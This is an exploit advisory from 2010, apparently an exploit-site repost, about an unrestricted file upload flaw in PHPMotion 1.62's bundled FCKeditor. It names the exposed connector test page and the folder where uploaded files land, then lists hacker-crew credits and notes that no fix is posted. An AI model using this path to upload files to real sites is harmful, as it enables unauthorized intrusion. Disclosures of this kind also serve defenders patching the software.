PHPMotion FCKeditor File Upload Vulnerability

2010-11-23 14:15:13

-----------------------------------------------------------------------
phpmotion/FCKeditor File upload vulnerabilities
-----------------------------------------------------------------------
Author : trycyber ([email protected])
Homepage : http://indonesiancoder.com,magelangcyber.web.id
Vendor : http://www.phpmotion.com/
Dork : CIHUY ;p
Version : 1.62
Tested on : Win Xp sp2
Date : November 23, 2010
-----------------------------------------------------------------------

I. POC & Exploit
-----------------------------------------------------------------------
Default : http://127.0.0.1/


exploit : http://127.0.0.1/phpmotion/fckeditor/editor/filemanager/connectors/test.html


results in : http://127.0.0.1/userfiles/name of file


------------------------------------------------------------------------
Credits
------------------------------------------------------------------------
Allahu Akbar
INDONESIAN CODER ~ Magelangcyber-team ~ Kill-9 Crew ~ MC Crew
Don Tukulesto ~ kaMtiEz ~ ibl13z ~ Jundab ~ N4ck0 ~ Yurakha ~ aN93l1c ~ Mboys ~ Contrex ~ n4KuLa_
k4L0ng666 ~ Xr0b0t ~ Adipati ~ Arianom ~ t3ll0 ~ cimpli ~ Pathloader

-------------------------------------------------------------------------
"aku belajar bukan karenamu, melainkan aku ingin aku menjadi aku"

Indonesiancoder family & Magelangcyber family

Fixes

No fixes

In order to submit a new fix you need to be registered.